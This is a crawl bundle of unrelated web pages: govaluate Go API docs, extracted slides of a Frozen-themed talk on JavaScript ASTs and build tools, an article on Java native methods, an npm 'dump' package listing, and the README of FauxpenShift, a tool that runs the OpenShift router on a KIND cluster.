Convenient soft-deletion support for Django models Project description About A Django field that enables convenient soft-deletion. For Python 2.7/3.3+ and Django 1.8+ Installation Simple: pip install django-livefield. Example Usage >>> from django.db import models >>> from livefield import LiveField, LiveManager >>> >>> >>> class Person(models.Model): ... name = models.CharField() ... live = LiveField() ... ... objects = LiveManager() ... all_objects = LiveManager(include_soft_deleted=True) ... ... class Meta: ... unique_together = ('name', 'live') ... ... def delete(self, using=None): ... self.live = False ... self.save(using=using) ... >>> john = Person.objects.create(name='John Cleese') >>> doppelganger = Person(name='John Cleese') >>> doppelganger.save() # Raises an IntegrityError >>> john.delete() >>> doppelganger.save() # Succeeds! License MIT. See LICENSE.txt for details. Contributing Pull requests welcome! To save everyone some hassle, please open an issue first so we can discuss your proposed change. In your PR, be sure to add your name to AUTHORS.txt and include some tests for your spiffy new functionality. Travis CI will green-light your build once it passes the unit tests (./setup.py test) and our linters (./lint.sh). Changelog 3.3.0 - Django 3.x support - switch to BooleanField as base (Django 4.x deprecation) 3.2.1 - Fix rST formatting in this file to pass PyPI rendering check 3.2.0 (Not released) - Support Django 2.2 - Support Python 3.7 - Fix metadata to remove deprecated Django versions - Expand travis tests for versions and database engines - Remove obsolete pylint suppressions - Thanks to [@shurph]( for the above! 3.1.0 - Fix [deprecation of context param for Field.from_db_value]( - Support for Django 2.1 (Thanks [@lukeburden]( - Switch tests suite to use pytest - Remove pylint-django plugin, no longer needed 3.0.0 - Add support for Python 3.6 - Add support for Django 2.0 - Remove support for Python 3.4 - Remove support for old Django versions - Remove GIS 2.5.0 (Not released) - Added official Python 3 support. - Re-added support for Django 1.8. Now supports Django 1.8 and 1.9. 2.4.0 (2016-02-11) - Drop support for Django 1.8 - Add number of affected rows for delete methods (hard_delete, soft_delete, delete). Note: Django 1.9+ only. 2.1.0 (2014-09-04) - Add support for Django 1.7. 2.0.0 (2014-07-13) - Renamed top-level namespace to livefield. - Restructured internally to match Django convention. - Added GIS support. - Added South support. 1.0.0 (2014-02-14) - Initial release. - Separated existing code from main application repository. Developed and maintained by Hearsay Social, Inc.. Project details Release history Release notifications | RSS feed Download files Download the file for your platform. If you're not sure which to choose, learn more about installing packages. Source Distribution django-livefield-3.3.0.tar.gz (6.3 kB view hashes)
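The two managers in the usage example above only differ once a soft delete has happened; a short, hedged sketch of that difference (continuing the Person example, with an illustrative name):

>>> graham = Person.objects.create(name='Graham Chapman')
>>> graham.delete()   # soft delete: the live flag is cleared, the row is kept
>>> Person.objects.filter(name='Graham Chapman').exists()      # default manager: live rows only
False
>>> Person.all_objects.filter(name='Graham Chapman').exists()  # includes soft-deleted rows
True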
https://pypi.org/project/django-livefield/
CC-MAIN-2022-21
en
refinedweb
How does the "view" method work in PyTorch? The view function is meant to reshape the tensor. Say you have a tensor import torcha = torch.range(1, 16) a is a tensor that has 16 elements from 1 to 16(included). If you want to reshape this tensor to make it a 4 x 4 tensor then you can use a = a.view(4, 4) Now a will be a 4 x 4 tensor. Note that after the reshape the total number of elements need to remain the same. Reshaping the tensor a to a 3 x 5 tensor would not be appropriate. What is the meaning of parameter -1? If there is any situation that you don't know how many rows you want but are sure of the number of columns, then you can specify this with a -1. (Note that you can extend this to tensors with more dimensions. Only one of the axis value can be -1). This is a way of telling the library: "give me a tensor that has these many columns and you compute the appropriate number of rows that is necessary to make this happen". This can be seen in the neural network code that you have given above. After the line x = self.pool(F.relu(self.conv2(x))) in the forward function, you will have a 16 depth feature map. You have to flatten this to give it to the fully connected layer. So you tell pytorch to reshape the tensor you obtained to have specific number of columns and tell it to decide the number of rows by itself. Drawing a similarity between numpy and pytorch, view is similar to numpy's reshape function. Let's do some examples, from simpler to more difficult. The viewmethod returns a tensor with the same data as the selftensor (which means that the returned tensor has the same number of elements), but with a different shape. For example: a = torch.arange(1, 17) # a's shape is (16,)a.view(4, 4) # output below 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16[torch.FloatTensor of size 4x4]a.view(2, 2, 4) # output below(0 ,.,.) = 1 2 3 45 6 7 8(1 ,.,.) = 9 10 11 1213 14 15 16[torch.FloatTensor of size 2x2x4] Assuming that -1is not one of the parameters, when you multiply them together, the result must be equal to the number of elements in the tensor. If you do: a.view(3, 3), it will raise a RuntimeErrorbecause shape (3 x 3) is invalid for input with 16 elements. In other words: 3 x 3 does not equal 16 but 9. You can use -1as one of the parameters that you pass to the function, but only once. All that happens is that the method will do the math for you on how to fill that dimension. For example a.view(2, -1, 4)is equivalent to a.view(2, 2, 4). [16 / (2 x 4) = 2] Notice that the returned tensor shares the same data. If you make a change in the "view" you are changing the original tensor's data: b = a.view(4, 4)b[0, 2] = 2a[2] == 3.0False Now, for a more complex use case. The documentation says that each new view dimension must either be a subspace of an original dimension, or only span d, d + 1, ..., d + k that satisfy the following contiguity-like condition that for all i = 0, ..., k - 1, stride[i] = stride[i + 1] x size[i + 1]. Otherwise, contiguous()needs to be called before the tensor can be viewed. 
For example: a = torch.rand(5, 4, 3, 2) # size (5, 4, 3, 2)a_t = a.permute(0, 2, 3, 1) # size (5, 3, 2, 4)# The commented line below will raise a RuntimeError, because one dimension# spans across two contiguous subspaces# a_t.view(-1, 4)# instead do:a_t.contiguous().view(-1, 4)# To see why the first one does not work and the second does,# compare a.stride() and a_t.stride()a.stride() # (24, 6, 2, 1)a_t.stride() # (24, 2, 1, 6) Notice that for a_t, stride[0] != stride[1] x size[1] since 24 != 2 x 3 view() reshapes a tensor by 'stretching' or 'squeezing' its elements into the shape you specify: How does view() work? First let's look at what a tensor is under the hood: Here you see PyTorch makes a tensor by converting an underlying block of contiguous memory into a matrix-like object by adding a shape and stride attribute: shapestates how long each dimension is stridestates how many steps you need to take in memory til you reach the next element in each dimension view(dim1,dim2,...)returns a view of the same underlying information, but reshaped to a tensor of shape dim1 x dim2 x ...(by modifying the shapeand strideattributes). Note this implicitly assumes that the new and old dimensions have the same product (i.e. the old and new tensor have the same volume). PyTorch -1 -1 is a PyTorch alias for "infer this dimension given the others have all been specified" (i.e. the quotient of the original product by the new product). It is a convention taken from numpy.reshape(). Hence t1.view(3,2) in our example would be equivalent to t1.view(3,-1) or t1.view(-1,2).
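The t1 in that last sentence comes from figures that were not captured in the text above; a minimal stand-in with the same element count (6) behaves as described:

# hypothetical stand-in for the t1 used in the missing figures
t1 = torch.arange(6)   # tensor([0, 1, 2, 3, 4, 5]), 6 elements
t1.view(3, 2)          # shape (3, 2)
t1.view(3, -1)         # same thing: -1 is inferred as 6 / 3 = 2
t1.view(-1, 2)         # same thing: -1 is inferred as 6 / 2 = 3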
https://codehunter.cc/a/python/how-does-the-view-method-work-in-pytorch
CC-MAIN-2022-21
en
refinedweb
Is there any way to kill a Thread? It is generally a bad pattern to kill a thread abruptly, in Python, and in any language. Think of the following cases: - the thread is holding a critical resource that must be closed properly - the thread has created several other threads that must be killed as well. The nice way of handling this, if you can afford it (if you are managing your own threads), is to have an exit_request flag that each thread checks on a regular interval to see if it is time for it to exit. For example: import threadingclass StoppableThread(threading.Thread): """Thread class with a stop() method. The thread itself has to check regularly for the stopped() condition.""" def __init__(self, *args, **kwargs): super(StoppableThread, self).__init__(*args, **kwargs) self._stop_event = threading.Event() def stop(self): self._stop_event.set() def stopped(self): return self._stop_event.is_set(): def _async_raise(tid, exctype): '''Raises an exception in the threads with id tid''' if not inspect.isclass(exctype): raise TypeError("Only types can be raised (not instances)") res = ctypes.pythonapi.PyThreadState_SetAsyncExc(ctypes.c_long(ctypes.c_long(tid), None) raise SystemError("PyThreadState_SetAsyncExc failed")class ThreadWithExc(threading.Thread): '''A thread class that supports raising an exception in the thread from another thread. ''' def _get_my_tid(self): """determines this (self's) thread id CAREFUL: this function is executed in the context of the caller thread, to get the identity of the thread represented by this instance. """ # TODO: in python 2.6, there's a simpler way to do: self.ident raise AssertionError("could not determine the thread's id") def raiseExc(self, exctype): """Raises the given exception type in the context of this thread. If the thread is busy in a system call (time.sleep(), socket.accept(), ...), the exception is simply ignored. If you are sure that your exception should terminate the thread, one way to ensure that it works is: t = ThreadWithExc( ... ) ... t.raiseExc( SomeException ) while t.isAlive(): time.sleep( 0.1 ) t.raiseExc( SomeException ) If the exception is to be caught by the thread, you need a way to check that your thread has caught it. CAREFUL: this function is executed in the context of the caller thread, to raise an exception in the context of the thread represented by this instance. """ _async_raise( self._get_my_tid(), exctype ) (Based on Killable Threads by Tomer Filiba. The quote about the return value of PyThreadState_SetAsyncExc appears to be from an old version of Python.) As noted in the documentation, this is not a magic bullet because if the thread is busy outside the Python interpreter, it will not catch the interruption. A good usage pattern of this code is to have the thread catch a specific exception and perform the cleanup. That way, you can interrupt a task and still have proper cleanup. There is no official API to do that, no. You need to use platform API to kill the thread, e.g. pthread_kill, or TerminateThread. You can access such API e.g. through pythonwin, or through ctypes. Notice that this is inherently unsafe. It will likely lead to uncollectable garbage (from local variables of the stack frames that become garbage), and may lead to deadlocks, if the thread being killed has the GIL at the point when it is killed. and all queue.Queue with multiprocessing.Queue and add the required calls of p.terminate() to your parent process which wants to kill its child p See the Python documentation for multiprocessing. 
Example:

import multiprocessing

proc = multiprocessing.Process(target=your_proc_function, args=())
proc.start()

# Terminate the process
proc.terminate()  # sends a SIGTERM
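The StoppableThread class in the first answer only helps if the thread's run() loop actually polls the flag; a minimal usage sketch (the work loop and sleep interval are illustrative):

import time

class Worker(StoppableThread):
    def run(self):
        while not self.stopped():
            # do one small unit of work, then check the flag again
            time.sleep(0.5)

w = Worker()
w.start()
# ... later, from another thread:
w.stop()   # ask the worker to exit
w.join()   # wait until it actually finishes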
https://codehunter.cc/a/python/is-there-any-way-to-kill-a-thread
CC-MAIN-2022-21
en
refinedweb
Appending data on an SD card file

Hi All, I am trying to create a simple data-logger using some very simple sensor inputs as a test. I am using the "SD" and "os" modules to write values to a text file on an SD card on the pymakr board. I can mount it and then open the file to successfully write to the card; however, when I close and then re-open the file when I want to write to it again, it overwrites my original data. Is there any way to append the data to the file instead of overwriting? I can't keep the file open, as I might want to turn the logger off and on over different sessions. I also don't want to "readall()" my existing data into RAM, append, then re-write the entire data-set, as this is ugly, slow, and I might have a large amount of data which could crash the system. It seems like pretty standard functionality to leave out, if this is the case. I also noticed that there is no delete-file function mentioned in the "os" module, which is what the "SD" example code uses, but there is a similar module called "uos" in which you can. Does anyone know why there are two similar "uos" and "os" modules, despite being somewhat redundant, and why "os" is not in the documentation? Can anyone clarify this for me please? Thanks in advance.

Hi, uos is the micropython version of the os library. When you do import os, it is actually just an alias and it really imports uos. This is for compatibility with existing python code. If you go to the REPL on your device and run

import uos
dir(uos)
import os
dir(os)

You will see the lists are identical. If we are missing documentation for some of the methods I will add it to my to-do list to add this documentation.

Ah excellent, that's an easy solution! Thanks again Robert :)
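For the appending question itself, the missing piece is just the file open mode; a tiny sketch, assuming the card is already mounted at /sd as in the original post (file name and sample line are placeholders):

# 'a' opens the file for appending; it is created if it does not exist yet,
# and each logging session adds to the end instead of overwriting
with open('/sd/datalog.txt', 'a') as f:
    f.write('21.5,1013\n')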
https://forum.pycom.io/topic/2159/appending-data-on-an-sd-card-file
CC-MAIN-2022-21
en
refinedweb
Split the text into sentences, keeping the delimiter

Is it enough to detect the end of a sentence as "end-of-sentence punctuation, then a space, then a capital letter"? For example:

"Hi! I'm a simple text. Can you share me?"
['Hi!', "I'm a simple text.", 'Can you share me?']

There was an attempt, but a bad one:

re.split(r'\w[.!?]+\s+[А-Я]', "Hello! I'm John. Are you OK? fine... and so")

Split on the space itself, but use a lookbehind to make sure that right before the space there is a letter followed by the end-of-sentence punctuation, so the delimiter stays with its sentence:

import re

result = re.split(r'(?<=\w[.!?]) ', "Hello! I'm John. Are you OK? fine... and so")
print(result)

result = re.split(r'(?<=\w[.!?]) ', ?")
print(result)

Result:

['Hello!', "I'm John.", 'Are you OK?', 'fine... and so']
[?']

P.S. I didn't check it on Unicode.

UPD: \w could perhaps be replaced with an explicit list of allowed characters, since \w also matches digits and the underscore.
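The P.S. leaves the Unicode question open; in Python 3, \w matches Cyrillic letters by default, so the same lookbehind should also work on Russian text. A quick, hedged check with an illustrative string:

import re

text = "Привет! Я просто текст. Можешь меня разделить?"
print(re.split(r'(?<=\w[.!?]) ', text))
# ['Привет!', 'Я просто текст.', 'Можешь меня разделить?']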
https://software-testing.com/topic/892837/break-the-text-on-the-proposals-with-the-retention-of-the-divider
CC-MAIN-2022-21
en
refinedweb
ec_malloc_size

Name
ec_malloc_size — Allocate a block of memory of arbitrary size

Synopsis
#include "ec_malloc.h"

void *ec_malloc_size(object_type, size);

Description
Allocate a block of memory of arbitrary size. The memory is uninitialized.

Note: This function is only valid with the VSIZE memory type, not a fixed size type. For more information about memory types see Memory Types.

The system will use the locally configured allocator to satisfy the allocation, but this choice will be overridden by the setting of the malloc2mmap_threshold setting. Since 3.0.25, the behavior of malloc2mmap_threshold is as follows: If malloc2mmap_threshold is set to "auto" in the configuration file (this is equivalent to -1), and the allocator is set to use the system allocator (malloc), then the threshold value is assumed to be 4092. If the allocator is not malloc, then the threshold value is assumed to be "off" (0). If the option is configured with any other value, then that value is used as the threshold. Any sized allocation where SIZE exceeds the effective threshold value will be satisfied using the mmap system call.

In versions prior to 3.0.25, the malloc2mmap_threshold is ignored unless the allocator is set to the system allocator. The default value is 4092. In all versions, if the effective threshold value is 0, then mmap() will not be used directly by ec_malloc_size allocations, although the underlying allocator may opt to use mmap itself. Regardless of whether mmap() is used directly or indirectly by ec_malloc_size, the memory returned from this function must only be freed using ec_free.

- object_type
This parameter is an integer indicating a memory type as defined in the section called "Memory Types".
- size
A size_t type unsigned integer.

This function returns a void pointer to the memory location. It is legal to call this function in any thread.
https://support.sparkpost.com/momentum/3/3-api/apis-ec-malloc-size
CC-MAIN-2022-21
en
refinedweb
What are daemon threads in Java?

A daemon thread is a thread that does some task in the background, like handling requests or the various cron jobs that can exist in an application. When only daemon threads remain in your program, it will exit. This is because these threads usually work together with normal threads and provide background handling of events. You can mark a Thread as a daemon by using the setDaemon method; daemon threads usually don't exit and aren't interrupted, they just stop when the application stops.
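A short, hedged illustration of the setDaemon call mentioned above (the background task is a placeholder):

public class DaemonDemo {
    public static void main(String[] args) {
        Thread heartbeat = new Thread(() -> {
            while (true) {
                // background housekeeping would go here
                try { Thread.sleep(1000); } catch (InterruptedException e) { return; }
            }
        });
        heartbeat.setDaemon(true);   // must be set before start()
        heartbeat.start();
        // main finishes here; since only the daemon thread remains, the JVM exits
        System.out.println("main done");
    }
}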
https://www.edureka.co/community/8140/what-are-daemon-threads-in-java
CC-MAIN-2022-21
en
refinedweb
Section (2) pipe Name pipe, pipe2 — create pipe Synopsis #include <unistd.h> /* On Alpha, IA-64, MIPS, SuperH, and SPARC/SPARC64; see NOTES */ struct fd_pair { long fd[2]; }; /* On all other architectures */ #define _GNU_SOURCE /* See feature_test_macros(7) */ #include <fcntl.h> /* Obtain O_* constant definitions */ #include <unistd_CLOEXEC Set the close-on-exec ( FD_CLOEXEC) flag on the two new file descriptors. See the description of the same flag in open(2) for reasons why this may be useful. O_DIRECT(since Linux 3.4) Create a pipe that performs I/O in packet mode. Each write(2) to the pipe is dealt with as a separate packet, and read(2)s from the pipe will read one packet at a time. Note the following points: Writes of greater than PIPE_BUFbytes (see pipe(7)) will be split into multiple packets. The constant PIPE_BUFis defined in limits.h If a read(2) specifies a buffer size that is smaller than the next packet, then the requested number of bytes are read, and the excess bytes in the packet are discarded. Specifying a buffer size of PIPE_BUFwillsetting of a pipe file descriptor using fcntl(2). O_NONBLOCK Set the O_NONBLOCKfile status flag on the open file descriptions referred to by the new file descriptors. Using this flag saves extra calls to fcntl(2) to achieve the same result. RETURN VALUE On success, zero is returned. On error, −1 is returned, errno is set appropriately, and pipefd is left unchanged. On Linux (and other systems), pipe() does not modify pipefd on failure. A requirement standardizing this behavior was added in POSIX.1-2016. The Linux-specific pipe2() system call likewise does not modify pipefd on failure. ERRORS - EFAULT pipefdis). VERSIONS pipe2() was added to Linux in version 2.6.27; glibc support is available starting with version 2.9. NOTES The SystemV_zsingle_quotesz_t take any arguments and returns a pair of file descriptors as the return value on success. The glibc pipe() wrapper function transparently deals with this. See syscall(2) for information regarding registers used for storing second file descriptor. EXAMPLE The following program creates a pipe, and then fork(2)s to create a child process; the child inherits a duplicate set of file descriptors that refer to the same pipe. After the fork(2), each process closes the file descriptors that it doesn_zsingle_quotesz_t need for the pipe (see pipe(7)). The parent then writes the string contained in the program_zsingle_quotesz_s command-line argument to the pipe, and the child reads this string a byte at a time from the pipe and echoes it on standard output. 
Program source > , argv[0]); exit(EXIT_FAILURE); } if (pipe(pipefd) == −1) { perror(pipe); exit(EXIT_FAILURE); } cpid = fork(); if (cpid == −1) { perror(fork); exit(EXIT_FAILURE); } if (cpid == 0) { /* Child reads from pipe */ close(pipefd[1]); /* Close unused write end */ while (read(pipefd[0], &buf, 1) > 0) write(STDOUT_FILENO, &buf, 1); write(STDOUT_FILENO, ,), splice(2), tee(2), vmsplice(2), write(2), popen(3), pipe(7) Section (7) pipe Name pipe — overview of pipes and FIFOs DESCRIPTION PipesOs On Linux, the following files control how much memory can be used for pipes: /proc/sys/fs/pipe-max-pages (only in Linux 2.6.34) An upper limit, in pages, on the capacity that an unprivileged user (one without the CAP_SYS_RESOURCEcapability)capability., attempts to create new pipes will be denied, and attempts to increase a pipe_zsingle_quotesz, individual pipes created by a user will be limited to one page, and attempts to increase a pipe_zsingle_quotesz POSbytes are written atomically; write(2) may block if there is not room for nbytes to be written immediately O_NONBLOCKenabled, n<= PIPE_BUF If there is room to write nbytes to the pipe, then write(2) succeeds immediately, writing all nbytes; otherwise write(2) fails, with errnoset to EAGAIN. O_NONBLOCKdisabled, n> PIPE_BUF The write is nonatomic: the data given to write(2) may be interleaved with write(2)s by other process; the write(2) blocks until nbytes have been written. O_NONBLOCKenabled, n> PIPE_BUF If the pipe is full, then write(2) fails, with errnoset to EAGAIN. Otherwise, from 1 to nbytes may be written (i.e., a partial write may occur; the caller should check the return value from write(2) to see how many bytes were actually written), and these bytes may be interleaved with writes by other processes. Open file status flags On some systems (but not Linux), pipes are bidirectional: data can be transmitted in both directions between the pipe ends. POSIX.1 requires only unidirectional pipes. Portable applications should avoid reliance on bidirectional pipe semantics. BUGS Before Linux 4.9, some bugs affected the handling of the pipe-user-pages-soft and pipe-user-pages-hard limits when using the fcntl(2) F_SETPIPE_SZ operation to change a pipe_zsingle_quotesz_zsingle_quotesz_s capacity; an unprivileged user can always decrease a pipe_zsingle_quotesz_zsingle_quotesz. SEE ALSO mkfifo(1), dup(2), fcntl(2), open(2), pipe(2), poll(2), select(2), socketpair(2), splice(2), stat(2), tee(2), vmsplice(2), mkfifo(3), epoll(7), fifo(7)
https://manpages.net/detail.php?name=pipe
CC-MAIN-2022-21
en
refinedweb
I'm trying to deploy my Django application to the web, but I get the following error: You're using the staticfiles app without having set the STATIC_ROOT setting to a filesystem path. However, I did set it in my production.py: from django.conf import settings DEBUG = False TEMPLATE_DEBUG = True DATABASES = settings.DATABASES STATIC_ROOT = os.path.join(PROJECT_ROOT, 'static') # Update database configuration with $DATABASE_URL. import dj_database_url db_from_env = dj_database_url.config(conn_max_age=500) DATABASES['default'].update(db_from_env) # Static files (CSS, JavaScript, Images) # PROJECT_ROOT = os.path.dirname(os.path.abspath(__file__)) STATIC_URL = '/static/' # Extra places for collectstatic to find static files. STATICFILES_DIRS = ( os.path.join(PROJECT_ROOT, 'static'), ) # Simplified static file serving. # STATICFILES_STORAGE = 'whitenoise.django.GzipManifestStaticFilesStorage' What is the production.py file? How do you import your settings? Depending on how you got this error (serving Django through a WSGI server or on the command line), check manage.py or wsgi.py to see what the name of the default settings file is. If you want to manually set the settings module to use, pass something like this: ./manage.py --settings=production, where production is any Python module. Moreover, your settings file should not import anything Django related. If you want to split your settings for different environments, use something like this. A file settings/base.py: # All settings common to all environments PROJECT_ROOT = os.path.dirname(os.path.abspath(__file__)) STATIC_URL = '/static/' STATIC_ROOT = os.path.join(PROJECT_ROOT, 'static') Files like settings/local.py, settings/production.py: # Production settings from settings.base import * DEBUG = False DATABASES = … If you are using Django 2.2 or greater, your settings file already has a line similar to this: # Build paths inside the project like this: os.path.join(BASE_DIR, ...) BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) Therefore you can easily set the static settings like so: STATIC_URL = '/static/' STATIC_ROOT = os.path.join(BASE_DIR, 'static') Django settings for static assets can be a bit difficult to configure and debug. However, if you just add the following settings to your settings.py, everything should work exactly as expected: go to settings.py and add the following code: BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # Static files (CSS, JavaScript, Images) # STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles') STATIC_URL = '/static/' # Extra places for collectstatic to find static files. STATICFILES_DIRS = ( os.path.join(BASE_DIR, 'static'), ) See a full version of our example settings.py on GitHub. Now create a static folder in the root directory, and put a file inside it. For more, refer to the source link below.
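To make the "check manage.py or wsgi.py" advice concrete: both files are thin wrappers that point Django at a settings module, so looking at them tells you which settings file is actually being loaded in each environment. A rough sketch follows; the module path mysite.settings.production is a placeholder, not taken from the question.

    # manage.py / wsgi.py typically contain a line like this:
    import os
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "mysite.settings.production")

    # The equivalent on the command line is an explicit flag:
    #   ./manage.py collectstatic --settings=mysite.settings.production
    # or exporting the variable before starting the WSGI server:
    #   export DJANGO_SETTINGS_MODULE=mysite.settings.production

If the environment ends up pointing at a settings module that never defines STATIC_ROOT, collectstatic raises exactly the error quoted above, regardless of what production.py contains.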
https://techstalking.com/programming/python/python-django-youre-using-the-staticfiles-app-without-having-set-the-static_root-setting/
CC-MAIN-2022-40
en
refinedweb
SPA, which stands for Single Page Application, is the latest trend in web application development. It is a web application that loads a single HTML page initially and is dynamically updated as the user interacts with the application. In this article we will see the motivation for SPAs and explore the technologies we can use to create a Single Page Application. We will also see how to create a basic application using AngularJS, WebAPI and Entity Framework. The goal of a SPA is to give the user an experience which is like a desktop application. A SPA provides a rich user experience by reducing round trips to the server. This is achieved by moving as much logic as possible to the client. In a Single Page Application or SPA the page never reloads, though parts of the page may refresh. This reduces the round trips to the server to a minimum. If we consider any web application, there are two main components involved: the web server and the web browser, or client. [Image 2] As is clear from the diagram, the client side has a lot more responsibilities in the case of SPAs than in a traditional web application. Implementing all these additional responsibilities using JavaScript and HTML alone increases complexity, and it is not an easy task to build and maintain such a complex application. jQuery drastically reduces the complexity of manipulating the DOM, but we still need to understand the DOM architecture to manipulate it. Also, testing code written using JavaScript or jQuery can be a big challenge. So building SPAs from scratch can be a real nightmare. This is where JavaScript presentation frameworks are useful. There are open-source JavaScript frameworks available to create SPAs; two of the most common ones are DurandalJS and AngularJS. Most SPA applications are structured as: [Image 3] Model is the single source of data for the application. Controller ties views and model together. Using the code In this application we will be using the following frameworks and technologies. Client: AngularJS, an open-source JavaScript framework by Google. It helps to structure browser-based applications using model, view and controller. Server: WebAPI is a framework to build HTTP services and is suitable for building RESTful services. Entity Framework and SQL Server: Entity Framework is an object-relational mapper that enables .NET developers to work with relational data using domain-specific objects. SQL Server is the relational database most commonly used in .NET applications. Here we will be using Angular to build a simple application that provides CRUD functionality, so we will be looking into the main features of Angular. Angular is a complete SPA framework and provides a lot of features as a presentation framework; we will touch on the main ones as we go. So let's get started building our first basic SPA using AngularJS. We will be discussing the features of AngularJS along the way. The first thing we need to do to use AngularJS is to include the AngularJS library: <script src="~/Scripts/js/angular.min.js"></script> Now we are ready to use the AngularJS features in our application. Now we will create a module that will define the scope for the application and a controller that coordinates with the view and model.
Though we are creating a single module, a real world application can consist of multiple modules. Following is the module and the controller that calls the service's get method. The methods for the other CRUD operations are similar to the get method shown below.
    var customersApp = angular.module('customersApp', ['ngGrid']);
    customersApp.controller('customerCtrl', function ($scope, customerRepository) {
    });
You might be wondering what the customerRepository is. For that we first need to understand the concept of services and factories. These are used to generate an object or function that represents the service, which can be consumed by the rest of the application. This object or function is then passed as a parameter to any other function which wants to use this service or factory. This is possible because of the dependency injection (DI) provided by AngularJS automatically. When declaring serviceName as an injectable argument you will be provided with an instance of the function, in other words new Function(). So when using a service as an argument, a new instance of the service function is created. When using a factory as an argument, the value of the argument is the value returned by invoking the function passed to the factory method. The illustration below will make it clearer.
    app.factory('MyFactory', function(){
        return {
            testfunction: function(text){
                return "Hello" + text;
            }
        };
    });
Here, if we use MyFactory as a function argument, the value of that argument is whatever the factory function returned, in this case an object exposing testfunction. Here we will be using a factory to fetch the data from the WebAPI.
    customersApp.factory('customerRepository', function ($http) {
        return {
            getCustomers: function (callback) {
                $http.get(url).success(callback);
            }
        };
    });
The $http service is an inbuilt Angular service that is used for communication with remote HTTP servers. One of the most important services to understand is the $scope service. It acts as the glue between the controller and the view, or HTML template. [Image 4] The controller is not aware of what views there are in the application. It just knows about the scope, which it sets and which is accessible from the view. If you have worked with MVVM or a similar presentation pattern, then it is similar to a viewmodel. Now let's go ahead and create our controller.
    customersApp.controller('customerCtrl', function ($scope, customerRepository) {
        getCustomers();
        function getCustomers() {
            customerRepository.getCustomers(function (results) {
                $scope.customerData = results;
            });
        }
    });
The get method fetches data from the WebAPI. The other methods for the CRUD operations are similar. Now that we have the script ready we can create the view template. Directives are a way to extend HTML. We can make custom HTML elements or extend the existing ones, so we can wrap the functionality that we want to provide in a directive. We can also provide additional functionality without directives by using jQuery, so you might wonder what the advantage of directives is. But the example below makes the advantage of directives obvious.
Using jQuery, first we have to write <input id="dateOfBirth"> and then call $('#dateOfBirth').datepicker(). Contrast this with how we could use it if datepicker were a directive: <input datepicker>. So using a directive is not only more convenient but also makes the functionality part of our HTML. Directives can be either elements or attributes. ngBind: the ngBind attribute tells Angular to replace the text content of the specified HTML element with the value of a given expression. We usually use the curly braces markup {{ }}, the data binding expression, which provides the same functionality. ngModel binds the input element to a property on the scope set by the controller. ng-app sets the scope for the AngularJS application and can be placed on any element, though it is typically placed on the root element. ng-app initializes the AngularJS app, so this is a required directive in any application using AngularJS. ng-controller attaches a controller to the view. The first directive we need to add to the page is <html ng-app="customersApp">. The above directive will instantiate the AngularJS application. We will now specify the controller to use with the ng-controller directive. We will use the controller we defined earlier: <body ng-controller="customerCtrl">. So the only thing we need to do in the view is to use the $scope to access the data. As you might have noticed, this creates a decoupled architecture, as the view and controller do not need to know about each other. Now we can use the data binding expressions in our views to display the data. Data binding expressions use the following form: {{ name }}, where name is the name of the variable we have added to the $scope. Now that we have created the HTML template we can move to the WebAPI part to store and retrieve the data. WebAPI is a framework for building HTTP services that can be consumed by different types of clients such as browsers and mobile devices. It's an ideal platform to build RESTful services. We will be using WebAPI to perform CRUD operations on the database. It is quite simple to perform CRUD operations using WebAPI. It provides methods that map to the standard HTTP verbs GET, POST, PUT and DELETE. These methods are used to perform database operations and handle the client requests. First we will create the Customer entity which we need to perform the actions on using the WebAPI methods.
    public class Customer {
        public string id { get; set; }
        public string city { get; set; }
        public string name { get; set; }
        public string address { get; set; }
        public string contactNo { get; set; }
        public string emailId { get; set; }
    }
    public class CustomerContext : DbContext {
        public DbSet<Customer> Customers { get; set; }
    }
Next we add the WebAPI controller class. [Image 5] In the model option we will select our Customer class and we will have the actions generated for us. As we are using the Entity Framework, the data access code is handled by Entity Framework for us. Following are the CRUD operations using the Entity Framework.
    public class CustomerController : ApiController {
        // GET api/<controller>
        public IEnumerable<Customer> Get() {
            CustomerContext customersdb = new CustomerContext();
            return customersdb.Customers;
        }
        public void Post([FromBody]Customer customer) {
            CustomerContext customersdb = new CustomerContext();
            customersdb.Customers.Add(customer);
            customersdb.SaveChanges();
        }
        // PUT api/<controller>/5
        public void Put(int id, [FromBody]Customer customer) {
            CustomerContext customersdb = new CustomerContext();
            Customer customerToRemove = customersdb.Customers.Find(customer.id);
            customersdb.Customers.Remove(customerToRemove);
            Customer updatedCustomer = customer;
            customersdb.Customers.Add(updatedCustomer);
            customersdb.SaveChanges();
        }
        // DELETE api/<controller>/5
        public void Delete(string id) {
            CustomerContext customersdb = new CustomerContext();
            Customer cust = customersdb.Customers.Find(id);
            customersdb.Customers.Remove(cust);
            customersdb.SaveChanges();
        }
    }
As we are using the code first approach, the database structure is created for us when we run the application. We can insert a new customer as well as edit and delete customers using the application. [Image 6] So this was a basic introduction to Single Page Applications. We saw how to create a CRUD application using AngularJS and WebAPI. JavaScript frameworks like AngularJS can help us get started creating a SPA application rapidly. This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL).
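The article shows only the getCustomers call on the Angular side and notes that the other CRUD methods are similar. A sketch of what the remaining factory methods might look like (the method names and the /api/customer route are assumptions, not code from the article):

    customersApp.factory('customerRepository', function ($http) {
        var url = '/api/customer';   // assumed Web API route for CustomerController
        return {
            getCustomers: function (callback) {
                $http.get(url).success(callback);
            },
            addCustomer: function (customer, callback) {
                $http.post(url, customer).success(callback);
            },
            updateCustomer: function (customer, callback) {
                $http.put(url + '/' + customer.id, customer).success(callback);
            },
            deleteCustomer: function (id, callback) {
                $http.delete(url + '/' + id).success(callback);
            }
        };
    });

Each method simply forwards to the corresponding HTTP verb on the WebAPI controller, so the Post, Put and Delete actions shown above are reached without any extra plumbing.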
https://codeproject.freetls.fastly.net/Articles/737030/A-basic-SPA-application-using-AngularJS-WebAPI-and?msg=4776414#xx4776414xx
CC-MAIN-2022-40
en
refinedweb
For example, elements 0 to 0x1000 are inaccessible. When you try to access an inaccessible element, you generate a segmentation violation, and your program crashes. A bus error is caused by alignment issues with the CPU (e.g., trying to read a long from an address which isn't a multiple of 4).
C Types, Casting, Segmentation Violations and Bus Errors
Three Common Type Bugs
The first one looks idiotic, but it is at the heart of all type bugs. Look at the following program:
    main() {
        char c;
        int i;
        int j;
        i = 10000;
        c = i;
        j = c;
        printf("I: %d, J: %d, C: %d\n", i, j, c);
